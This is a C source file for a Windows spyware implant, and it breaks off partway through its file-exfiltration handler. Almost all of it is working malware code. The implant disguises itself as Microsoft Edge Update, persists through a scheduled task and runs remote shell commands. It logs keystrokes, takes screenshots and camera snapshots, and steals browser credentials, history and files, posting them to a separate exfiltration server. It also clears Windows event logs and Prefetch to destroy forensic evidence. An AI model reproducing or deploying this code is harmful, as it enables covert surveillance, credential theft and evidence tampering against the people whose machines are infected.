/*
 * implant.c — Windows implant: mTLS (BP1), enrollment (BP2), secure jitter
 *             (BP3), keepalive shaping (BP5).
 *
 * BP2: the binary carries only the CA cert + a single-use enrollment token
 * baked in at compile time (-DENROLLMENT_TOKEN="...").  On first run it
 * generates a 2048-bit RSA keypair in memory, builds a CSR with the token
 * as CN, sends it to the controller over one-way TLS, receives a 30-day
 * signed cert, then reinitialises to full mTLS.  No private key is ever
 * written to disk.
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include "protocol.h"
#include "tls.h"
#include "implant_utils.h"
#include "platform.h"
#include "spyware.h"

#ifdef _WIN32
#include <wincrypt.h>
#include <winhttp.h>
#include <time.h>
#endif

/*
 * implant_certs.h is generated by generate_certs.sh and contains:
 *   implant_ca_cert_pem  / implant_ca_cert_pem_len
 * (BP2: cert and key are generated at runtime — not embedded in the binary)
 */
#include "implant_certs.h"
#include "token_obf.h"

/* BP2: enrollment token is XOR-obfuscated in the binary (token_obf.h).
 * Decoded at runtime onto the stack — never appears as a plaintext string
 * in .rodata and is not visible via `strings` on the binary. */
static void decode_enrollment_token(char *out)
{
    for (int i = 0; i < TOKEN_OBF_LEN; i++)
        out[i] = (char)(g_token_obf[i] ^ g_token_key[i % sizeof(g_token_key)]);
    out[TOKEN_OBF_LEN] = '\0';
}

/* ── Separate exfil channel (port 9443 HTTPS) ───────────────────────
 *
 * Exfil data (screenshots, keylogs, creds, history) is sent directly to
 * exfil-receiver via WinHTTP HTTPS POST — a completely different channel
 * from the mTLS C2 connection on port 443.  The C2 channel carries only
 * short command acknowledgements; no bulk data crosses it.
 *
 * URL format: https://<C2_DEFAULT_HOST>:9443/exfil/<hostname>/<filename>
 */
#ifdef _WIN32
#define EXFIL_PORT 9443

static void exfil_post(const char *hostname, const char *filename,
                        const char *data, int data_len)
{
    wchar_t w_host[256] = {0};
    MultiByteToWideChar(CP_ACP, 0, C2_DEFAULT_HOST, -1, w_host, 256);

    char path_buf[512];
    _snprintf(path_buf, sizeof(path_buf), "/exfil/%s/%s", hostname, filename);
    wchar_t w_path[512] = {0};
    MultiByteToWideChar(CP_ACP, 0, path_buf, -1, w_path, 512);

    HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0",
                                      WINHTTP_ACCESS_TYPE_NO_PROXY,
                                      WINHTTP_NO_PROXY_NAME,
                                      WINHTTP_NO_PROXY_BYPASS, 0);
    if (!hSession) return;

    HINTERNET hConnect = WinHttpConnect(hSession, w_host,
                                         (INTERNET_PORT)EXFIL_PORT, 0);
    if (!hConnect) { WinHttpCloseHandle(hSession); return; }

    HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", w_path,
                                             NULL, WINHTTP_NO_REFERER,
                                             WINHTTP_DEFAULT_ACCEPT_TYPES,
                                             WINHTTP_FLAG_SECURE);
    if (!hRequest) {
        WinHttpCloseHandle(hConnect);
        WinHttpCloseHandle(hSession);
        return;
    }

    /* Skip cert validation — exfil-receiver uses the same self-signed cert
     * as the delivery server, not the CA-signed mTLS cert. */
    DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA       |
                  SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
                  SECURITY_FLAG_IGNORE_CERT_CN_INVALID  |
                  SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
    WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS,
                     &flags, sizeof(flags));

    WinHttpSendRequest(hRequest,
                       WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                       (LPVOID)data, (DWORD)data_len, (DWORD)data_len, 0);
    WinHttpReceiveResponse(hRequest, NULL);

    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
}
#endif

/* ── BP5 keepalive thread ────────────────────────────────────────────
 *
 * Sends a COMMAND_KEEPALIVE packet at random 20–40 second intervals so
 * the TCP flow looks the same whether the operator is idle or actively
 * issuing commands.  The controller discards KEEPALIVE transparently in
 * recieve_packet().
 *
 * Thread safety (OpenSSL 3.x + TLS 1.3):
 *   SSL_read (main thread) and SSL_write (keepalive thread) may run
 *   concurrently on the same SSL object.  Concurrent SSL_write calls
 *   require serialisation — g_write_lock is acquired by both the main
 *   thread (before each send_packet) and the keepalive thread.  The
 *   keepalive uses trylock so it never blocks behind a long recv().
 */

static plat_mutex_t   g_write_lock;
static volatile Conn *g_conn   = NULL;
static volatile int   g_ka_run = 0;

#ifdef _WIN32
static DWORD WINAPI keepalive_thread(LPVOID arg)
{
    (void)arg;
    while (g_ka_run) {
        SLEEP(secure_jitter_sec(30, 10));
        if (!g_ka_run) break;
        if (MUTEX_TRYLOCK(&g_write_lock)) {
            Conn *c = (Conn *)g_conn;
            if (c) {
                Packet ka = {COMMAND_KEEPALIVE, 0, 0, NULL};
                send_packet(&ka, c);
            }
            MUTEX_UNLOCK(&g_write_lock);
        }
    }
    return 0;
}
#else
static void *keepalive_thread(void *arg)
{
    (void)arg;
    while (g_ka_run) {
        SLEEP(secure_jitter_sec(30, 10));
        if (!g_ka_run) break;
        if (MUTEX_TRYLOCK(&g_write_lock)) {
            Conn *c = (Conn *)g_conn;
            if (c) {
                Packet ka = {COMMAND_KEEPALIVE, 0, 0, NULL};
                send_packet(&ka, c);
            }
            MUTEX_UNLOCK(&g_write_lock);
        }
    }
    return NULL;
}
#endif

/* Wrapper: acquire write lock, send, release */
static int locked_send(Packet *p, Conn *c)
{
    MUTEX_LOCK(&g_write_lock);
    int ok = send_packet(p, c);
    MUTEX_UNLOCK(&g_write_lock);
    return ok;
}

/* ── BP2: credential persistence ────────────────────────────────────────
 *
 * After enrollment the issued cert + in-memory key are saved to disk so the
 * implant can reconnect after a reboot (scheduled-task persistence) without
 * re-enrolling.  The single-use token is already consumed after first run.
 *
 * Paths: %APPDATA%\MicrosoftEdge\ec.dat (cert) and ek.dat (key).
 * The directory already exists on most Windows installs (Edge creates it).
 * Both files are deleted by COMMAND_SHUTDOWN so no credentials survive
 * after the operator removes the implant.
 */

static void cred_paths(char *cert_out, char *key_out, int len)
{
#ifdef _WIN32
    /* Use a consistent path across User and SYSTEM sessions.
     * C:\Users\Public is accessible to both and is where i.exe lives. */
    const char *base = "C:\\Users\\Public";
    snprintf(cert_out, len, "%s\\MicrosoftEdge\\ec.dat", base);
    snprintf(key_out,  len, "%s\\MicrosoftEdge\\ek.dat", base);
#else
    snprintf(cert_out, len, "/tmp/.ec.dat");
    snprintf(key_out,  len, "/tmp/.ek.dat");
#endif
}

/* ── Connection helpers ──────────────────────────────────────────────── */

/* Open a TCP connection to the controller; return the raw fd or -1. */
static int make_raw_socket(void)
{
    const char *host     = getenv("C2_HOST");
    const char *port_env = getenv("C2_PORT");

#ifndef C2_DEFAULT_HOST
#define C2_DEFAULT_HOST "c2-server"
#endif
    if (!host || host[0] == '\0')
        host = C2_DEFAULT_HOST;

    int port = 443;
    if (port_env && port_env[0] != '\0') {
        int p = atoi(port_env);
        if (p > 0) port = p;
    }

    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) return -1;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port   = htons(port);

    if (inet_pton(AF_INET, host, &addr.sin_addr) <= 0) {
        struct hostent *he = gethostbyname(host);
        if (!he || !he->h_addr_list || !he->h_addr_list[0]) {
            CLOSE_SOCKET(sock);
            return -1;
        }
        memcpy(&addr.sin_addr, he->h_addr_list[0], he->h_length);
    }

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        CLOSE_SOCKET(sock);
        return -1;
    }

    return sock;
}

/* BP2: one-way TLS enrollment — send CSR, receive signed cert.
 * Returns heap-allocated cert PEM on success (caller must free), NULL on
 * any failure (the caller will retry after jitter). */
static char *do_enrollment(const char *csr_pem, int csr_len, int *cert_len_out)
{
    int sock = make_raw_socket();
    if (sock < 0) return NULL;

    /* One-way TLS: controller authenticates; implant sends no client cert */
    Conn *conn = tls_client_wrap_enroll(sock);
    if (!conn) { CLOSE_SOCKET(sock); return NULL; }

    /* Send CSR */
    Packet req = {COMMAND_ENROLL_CSR, 0, csr_len, (char *)csr_pem};
    send_packet(&req, conn);

    /* Receive signed cert */
    Packet *resp = recieve_packet(conn);
    char *cert_pem = NULL;
    if (resp && resp->command_type == COMMAND_ENROLL_CERT
             && resp->payload_len > 0) {
        cert_pem = malloc(resp->payload_len);
        memcpy(cert_pem, resp->payload, resp->payload_len);
        *cert_len_out = resp->payload_len;
        free_packet(resp);
    } else {
        if (resp) free_packet(resp);
    }

    tls_conn_free(conn);
    return cert_pem;
}

/* Normal mTLS connection + HELLO */
static Conn *connect_to_controller(void)
{
    int sock = make_raw_socket();
    if (sock < 0) return NULL;

    /* BP1: perform mTLS handshake — controller verifies implant cert */
    Conn *conn = tls_client_wrap(sock);
    if (!conn) { CLOSE_SOCKET(sock); return NULL; }

    /* Send HELLO with OS info */
    char *os_info = operating_system_info();
    Packet hello = {COMMAND_HELLO, 0, (int)strlen(os_info), os_info};
    if (!locked_send(&hello, conn)) {
        free(os_info);
        tls_conn_free(conn);
        return NULL;
    }
    free(os_info);

    return conn;
}

/* ── Event log clearing ──────────────────────────────────────────────
 * Called on SHUTDOWN to remove forensic artifacts (process creation 4688,
 * scheduled task creation 4698, PowerShell script block 4104, Sysmon). */
#ifdef _WIN32
static void clear_event_logs(void)
{
    static const char *logs[] = {
        "Security",
        "System",
        "Application",
        "Microsoft-Windows-PowerShell/Operational",
        "Microsoft-Windows-Sysmon/Operational",
        NULL
    };
    for (int i = 0; logs[i]; i++) {
        HANDLE h = OpenEventLogA(NULL, logs[i]);
        if (h) {
            ClearEventLogA(h, NULL);
            CloseEventLog(h);
        }
    }
}
#endif

/* ── Prefetch cleanup ────────────────────────────────────────────────
 * Called on SHUTDOWN to delete Prefetch entries created by the exploit
 * chain.  Uses FindFirstFile/FindNextFile with wildcard patterns so the
 * hash suffix (e.g. MICROSOFTEDGEUPDATE.EXE-AB1234CD.pf) does not need
 * to be known at compile time.  No child process is spawned. */
#ifdef _WIN32
static void clear_prefetch(void)
{
    static const char *patterns[] = {
        "C:\\Windows\\Prefetch\\MICROSOFTEDGEUPDATE.EXE-*.pf",
        "C:\\Windows\\Prefetch\\I.EXE-*.pf",
        "C:\\Windows\\Prefetch\\POWERSHELL.EXE-*.pf",
        "C:\\Windows\\Prefetch\\FODHELPER.EXE-*.pf",
        NULL
    };

    WIN32_FIND_DATAA fd;
    for (int i = 0; patterns[i]; i++) {
        HANDLE h = FindFirstFileA(patterns[i], &fd);
        if (h == INVALID_HANDLE_VALUE) continue;
        do {
            char path[MAX_PATH];
            _snprintf(path, sizeof(path),
                      "C:\\Windows\\Prefetch\\%s", fd.cFileName);
            DeleteFileA(path);
        } while (FindNextFileA(h, &fd));
        FindClose(h);
    }
}
#endif

/* ── Self-relocation ─────────────────────────────────────────────────
 *
 * The stager (medium-integrity) drops i.exe to C:\Users\Public because
 * it cannot write to Program Files.  Once fodhelper has elevated us to
 * high-integrity, we copy ourselves to the more convincing install path,
 * re-launch from there, and exit — leaving no i.exe behind.
 */
#ifdef _WIN32
#define IMPLANT_STAGE_PATH   "C:\\Users\\Public\\i.exe"
#define IMPLANT_TARGET_DIR   "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate"
#define IMPLANT_TARGET_PATH  "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe"

/* Copy self to the target install path and re-launch from there.
 * Returns 1 if the new process was started (caller must exit immediately),
 * 0 if we are already at the target or if relocation fails (run in place). */
static int self_relocate(void)
{
    char self_path[MAX_PATH];
    if (!GetModuleFileNameA(NULL, self_path, sizeof(self_path)))
        return 0;

    if (_stricmp(self_path, IMPLANT_TARGET_PATH) == 0)
        return 0;   /* already installed — nothing to do */

    CreateDirectoryA(IMPLANT_TARGET_DIR, NULL);

    if (!CopyFileA(self_path, IMPLANT_TARGET_PATH, FALSE))
        return 0;   /* copy failed (e.g. not yet elevated) — run in place */

    STARTUPINFOA si;
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;

    char cmd[MAX_PATH + 20];
    _snprintf(cmd, sizeof(cmd), "\"%s\" --relocated", IMPLANT_TARGET_PATH);

    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));

    if (!CreateProcessA(NULL, cmd, NULL, NULL, FALSE,
                        CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
        return 0;

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 1;
}
#endif

/* ── main ────────────────────────────────────────────────────────────── */

int main(int argc, char **argv)
{
#ifdef _WIN32
    /* Relocate to the install path before doing anything else.
     * self_relocate() returns 1 if it launched a copy from the target
     * path — we must exit so the original (i.exe) process terminates and
     * becomes deletable. */
    if (self_relocate())
        return 0;

    /* If we were re-launched from the install path, clean up the staging
     * copy now that it is no longer locked by a running process. */
    if (argc >= 2 && strcmp(argv[1], "--relocated") == 0)
        DeleteFileA(IMPLANT_STAGE_PATH);

    /* Screenshot helper: spawned in the user session by spy_screenshot_capture
     * when the main implant is running as SYSTEM (Session 0).  Take the GDI
     * screenshot, write the BMP to the given path, and exit immediately. */
    if (argc >= 3 && strcmp(argv[1], "--screenshot") == 0) {
        int len = 0;
        char *data = spy_screenshot_capture(&len);
        if (data) {
            FILE *fp = fopen(argv[2], "wb");
            if (fp) { fwrite(data, 1, len, fp); fclose(fp); }
            free(data);
        }
        return 0;
    }

    /* Camera helper: spawned in the user session by spy_camera_snapshot when
     * the main implant is running as SYSTEM.  Captures frame, writes BMP. */
    if (argc >= 3 && strcmp(argv[1], "--camera-snapshot") == 0) {
        int len = 0;
        char *data = spy_camera_snapshot(&len);
        if (data) {
            FILE *fp = fopen(argv[2], "wb");
            if (fp) { fwrite(data, 1, len, fp); fclose(fp); }
            free(data);
        }
        return 0;
    }

    /* Single-instance guard: if the exploit fires more than once (e.g. victim
     * refreshes the page), a second i.exe will start and try to run as a full
     * implant.  The Global\ prefix makes the mutex visible across all sessions
     * and users so it catches both same-session and cross-session duplicates. */
    HANDLE g_mutex = CreateMutexA(NULL, TRUE, "Global\\MicrosoftEdgeUpdateMtx");
    if (GetLastError() == ERROR_ALREADY_EXISTS) {
        if (g_mutex) CloseHandle(g_mutex);
        return 0;
    }
#endif
    (void)argc; (void)argv;

    platform_init();
    MUTEX_INIT(&g_write_lock);

    /* ── BP2: enrollment on first contact (or load persisted creds) ─────
     *
     * First run:
     *   1. Init OpenSSL via enrollment context.
     *   2. Generate 2048-bit RSA keypair + CSR.
     *   3. Connect to controller with CA-only TLS (no client cert).
     *   4. Send CSR; receive CA-signed cert; retry with jitter on failure.
     *   5. Save cert + key to disk for future restarts.
     *   6. Tear down enrollment context; reinit with issued cert + key.
     *
     * Subsequent runs (persistence / reboot):
     *   Load cert + key from disk — skip enrollment entirely.
     *   The single-use token was already consumed on first run.
     */
    char cred_cert_path[512], cred_key_path[512];
    cred_paths(cred_cert_path, cred_key_path, 512);

    /* Always init OpenSSL first — needed for cert validation and enrollment */
    tls_init_client_enroll(
        (const char *)implant_ca_cert_pem, implant_ca_cert_pem_len);

    int   cert_len = 0, key_len = 0;
    char *cert_pem = read_file_heap(cred_cert_path, &cert_len);
    char *key_pem  = read_file_heap(cred_key_path,  &key_len);

    /* Validate stored cert against the embedded CA.  If the CA was rotated
     * (launch.sh was re-run), the stored cert will fail this check — we must
     * delete it and re-enroll with the fresh token from the new binary. */
    int creds_valid = cert_pem && key_pem &&
                      tls_cert_signed_by_ca(cert_pem, cert_len,
                                             (const char *)implant_ca_cert_pem,
                                             implant_ca_cert_pem_len);

    if (!creds_valid) {
        /* Stale or missing credentials — delete any stale files and enroll */
        free(cert_pem); cert_pem = NULL;
        free(key_pem);  key_pem  = NULL;
        cert_len = key_len = 0;
        remove(cred_cert_path);
        remove(cred_key_path);

        char *csr_pem = NULL;
        int   csr_len = 0;
        char  enrollment_token[TOKEN_OBF_LEN + 1];
        decode_enrollment_token(enrollment_token);
        if (!tls_gen_key_and_csr(enrollment_token,
                                  &key_pem, &key_len,
                                  &csr_pem, &csr_len)) {
            while (1) SLEEP(60);
        }

        while (!cert_pem) {
            cert_pem = do_enrollment(csr_pem, csr_len, &cert_len);
            if (!cert_pem)
                SLEEP(secure_jitter_sec(30, 10));
        }
        free(csr_pem);

        /* Save DPAPI-encrypted credentials for future restarts */
        write_file_safe(cred_cert_path, cert_pem, cert_len);
        write_file_safe(cred_key_path,  key_pem,  key_len);
    }

    /* Tear down enrollment context; reinit with issued/loaded cert + key */
    tls_cleanup();
    tls_init_client_mem(
        (const char *)implant_ca_cert_pem, implant_ca_cert_pem_len,
        cert_pem, cert_len,
        key_pem,  key_len
    );
    free(cert_pem); cert_pem = NULL;
    free(key_pem);  key_pem  = NULL;

    /* ── Connect — BP3: retry with cryptographically random jitter ──── */
    Conn *conn = NULL;
    while (!conn) {
        conn = connect_to_controller();
        if (!conn)
            SLEEP(secure_jitter_sec(30, 10));
    }

    g_conn   = conn;
    g_ka_run = 1;

    /* Start BP5 keepalive background thread */
    plat_thread_t ka_thread;
    THREAD_START(&ka_thread, keepalive_thread, NULL);
    THREAD_DETACH(&ka_thread);

    int shutdown = 0;

    while (!shutdown) {
        /* SSL_read (blocking) — safe to run concurrently with SSL_write
         * (keepalive thread) in OpenSSL 3.x TLS 1.3 full-duplex mode.   */
        Packet *pkt = recieve_packet(conn);
        if (pkt == NULL) {
            /* Connection lost — tear down and retry */
            g_conn = NULL;
            tls_conn_free(conn);
            conn = NULL;

            while (!conn) {
                conn = connect_to_controller();
                if (!conn)
                    SLEEP(secure_jitter_sec(30, 10));
            }
            g_conn = conn;
            continue;
        }

        switch (pkt->command_type) {

        case COMMAND_HEARTBEAT: {
            char *payload = "ALIVE";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(payload), payload};
            locked_send(&resp, conn);
            break;
        }

        case COMMAND_SET_SLEEP: {
            int duration = *(int *)pkt->payload;
            char buf[64];
            snprintf(buf, sizeof(buf), "Sleeping for %d seconds", duration);
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(buf), buf};
            locked_send(&resp, conn);

            /* Pause keepalive, close connection, sleep, reconnect */
            g_conn = NULL;
            tls_conn_free(conn); conn = NULL;

            SLEEP(duration);

            while (!conn) {
                conn = connect_to_controller();
                if (!conn)
                    SLEEP(secure_jitter_sec(30, 10));
            }
            g_conn = conn;
            break;
        }

        case COMMAND_SHUTDOWN: {
#ifdef _WIN32
            {
                /* Drain the pipe so schtasks /delete completes before we
                 * proceed — hidden_popen closes the process handle
                 * immediately, and fclose alone does not wait. */
                FILE *fp = POPEN("schtasks /delete /tn \"MicrosoftEdgeUpdate\" /f", "r");
                if (fp) {
                    char drain[256];
                    while (fgets(drain, sizeof(drain), fp));
                    PCLOSE(fp);
                }
            }
            /* Spawn a hidden PowerShell to delete the binary after we exit.
             * The OS holds a lock on the running exe so direct deletion fails.
             * PowerShell sleeps 2 s (well after ExitProcess releases the lock)
             * then force-removes the file and the now-empty install dir.
             * MoveFileExA is kept as a reboot-time fallback in case PowerShell
             * is blocked by policy. */
            {
                char del_cmd[MAX_PATH + 256];
                _snprintf(del_cmd, sizeof(del_cmd),
                    "powershell.exe -WindowStyle Hidden -NonInteractive -Command "
                    "\"Start-Sleep 2; "
                    "Remove-Item -Force -ErrorAction SilentlyContinue '%s'; "
                    "Remove-Item -Force -ErrorAction SilentlyContinue '%s'\"",
                    IMPLANT_TARGET_PATH, IMPLANT_TARGET_DIR);
                STARTUPINFOA si;
                ZeroMemory(&si, sizeof(si));
                si.cb          = sizeof(si);
                si.dwFlags     = STARTF_USESHOWWINDOW;
                si.wShowWindow = SW_HIDE;
                PROCESS_INFORMATION pi;
                ZeroMemory(&pi, sizeof(pi));
                if (CreateProcessA(NULL, del_cmd, NULL, NULL, FALSE,
                                   CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
                    CloseHandle(pi.hThread);
                    CloseHandle(pi.hProcess);
                }
            }
            MoveFileExA(IMPLANT_TARGET_PATH, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
            DeleteFileA(IMPLANT_STAGE_PATH);
#endif
            /* Remove all implant files — credentials, keylog, temp dir */
            {
                char s_cert[512], s_key[512];
                cred_paths(s_cert, s_key, 512);
                remove(s_cert);
                remove(s_key);
#ifdef _WIN32
                DeleteFileA("C:\\Users\\Public\\MicrosoftEdge\\kl.dat");
                DeleteFileA("C:\\Users\\Public\\MicrosoftEdge\\ss.tmp");
                RemoveDirectoryA("C:\\Users\\Public\\MicrosoftEdge");
                clear_prefetch();
                clear_event_logs();
#endif
            }
            char *payload = "SUCCESSFULLY SHUTDOWN";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id,
                           (int)strlen(payload), payload};
            locked_send(&resp, conn);
            shutdown = 1;
            break;
        }

        case COMMAND_READ_DATA: {
            char path[pkt->payload_len + 1];
            memcpy(path, pkt->payload, pkt->payload_len);
            path[pkt->payload_len] = '\0';

            FILE *fp = fopen(path, "r");
            if (!fp) {
                char *err = "file not found";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                char output[4096];
                int  bytes = (int)fread(output, 1, sizeof(output), fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, bytes, output};
                locked_send(&resp, conn);
                fclose(fp);
            }
            break;
        }

        case COMMAND_WRITE_DATA: {
            char *payload  = pkt->payload;
            int   path_len = *(int *)payload;
            char  path[path_len + 1];
            memcpy(path, payload + 4, path_len);
            path[path_len] = '\0';

            char *contents     = payload + 4 + path_len;
            int   content_len  = pkt->payload_len - 4 - path_len;

            FILE *fp = fopen(path, "w");
            if (!fp) {
                char *err = "file not created/found";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                fwrite(contents, 1, content_len, fp);
                fclose(fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, 0, NULL};
                locked_send(&resp, conn);
            }
            break;
        }

        case COMMAND_RUN_CMD: {
            char cmd[pkt->payload_len + 1];
            memcpy(cmd, pkt->payload, pkt->payload_len);
            cmd[pkt->payload_len] = '\0';

            FILE *fp = POPEN(cmd, "r");
            if (!fp) {
                char *err = "popen failed";
                Packet resp = {COMMAND_ERROR, pkt->request_id,
                               (int)strlen(err), err};
                locked_send(&resp, conn);
            } else {
                char output[4096];
                int  bytes = (int)fread(output, 1, sizeof(output), fp);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, bytes, output};
                locked_send(&resp, conn);
                PCLOSE(fp);
            }
            break;
        }

        case COMMAND_SCREENSHOT: {
            int len = 0;
            char *data = spy_screenshot_capture(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "screenshot_%ld.bmp", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "screenshot exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "screenshot failed";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_CLIPBOARD_GET: {
            int len = 0;
            char *text = spy_clipboard_get(&len);
            if (text) {
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, len, text};
                locked_send(&resp, conn);
                free(text);
            } else {
                char *err = "clipboard empty or failed";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
            break;
        }

        case COMMAND_KEYLOG_START: {
            spy_keylog_start();
            char *msg = "keylogger started";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(msg), msg};
            locked_send(&resp, conn);
            break;
        }

        case COMMAND_KEYLOG_STOP: {
            spy_keylog_stop();
            char *msg = "keylogger stopped";
            Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(msg), msg};
            locked_send(&resp, conn);
            break;
        }

        case COMMAND_KEYLOG_DUMP: {
            int len = 0;
            char *data = spy_keylog_dump(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "keylog_%ld.txt", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "keylog exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "no log data";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_CRED_STEAL: {
            int len = 0;
            char *data = spy_browser_creds_steal(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "creds_%ld.bin", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "credentials exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "credential steal failed (not found or access denied)";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_HISTORY_STEAL: {
            int len = 0;
            char *data = spy_browser_history_steal(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "history_%ld.bin", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "history exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "history steal failed (not found or access denied)";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_CAMERA_SNAPSHOT: {
            int len = 0;
            char *data = spy_camera_snapshot(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "camera_%ld.bmp", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                free(data);
                char *ack = "camera snapshot exfiltrated";
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                const char *reason = spy_camera_last_error();
                char err[300];
                _snprintf(err, sizeof(err), "camera snapshot failed: %s",
                          (reason && reason[0]) ? reason : "unknown error");
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_FILE_SEARCH: {
            int len = 0;
            char *data = spy_file_search(&len);
#ifdef _WIN32
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                char filename[128];
                _snprintf(filename, sizeof(filename), "files_%ld.txt", (long)time(NULL));
                exfil_post(hostname, filename, data, len);
                /* Count newlines = file count */
                int count = 0;
                for (int i = 0; i < len; i++) if (data[i] == '\n') count++;
                free(data);
                char ack[64];
                _snprintf(ack, sizeof(ack), "file index exfiltrated (%d files)", count);
                Packet resp = {COMMAND_RESPONSE, pkt->request_id, (int)strlen(ack), ack};
                locked_send(&resp, conn);
            } else {
                char *err = "file search found no matching files";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
            }
#endif
            break;
        }

        case COMMAND_FILE_EXFIL: {
            char path[pkt->payload_len + 1];
            memcpy(path, pkt->payload, pkt->payload_len);
            path[pkt->payload_len] = '\0';
#ifdef _WIN32
            /* Reject files over 100 MB to avoid crashing the implant */
            WIN32_FILE_ATTRIBUTE_DATA fa;
            if (!GetFileAttributesExA(path, GetFileExInfoStandard, &fa)) {
                char *err = "file not found or access denied";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
                break;
            }
            if (fa.nFileSizeHigh > 0 || fa.nFileSizeLow > 100 * 1024 * 1024) {
                char *err = "file exceeds 100 MB limit";
                Packet resp = {COMMAND_ERROR, pkt->request_id, (int)strlen(err), err};
                locked_send(&resp, conn);
                break;
            }

            int len = 0;
            char *data = read_file_heap_plain(path, &len);
            if (!data) {
                /* File may be locked — try via temp copy */
                const char *tmp = "C:\\Users\\Public\\MicrosoftEdge\\fe.tmp";
                if (CopyFileA(path, tmp, FALSE)) {
                    data = read_file_heap_plain(tmp, &len);
                    DeleteFileA(tmp);
                }
            }
            if (data) {
                char hostname[MAX_COMPUTERNAME_LENGTH + 1] = {0};
                DWORD hn_len = sizeof(hostname);
                GetComputerNameA(hostname, &hn_len);
                /* Use the original filename as the exfil filename */
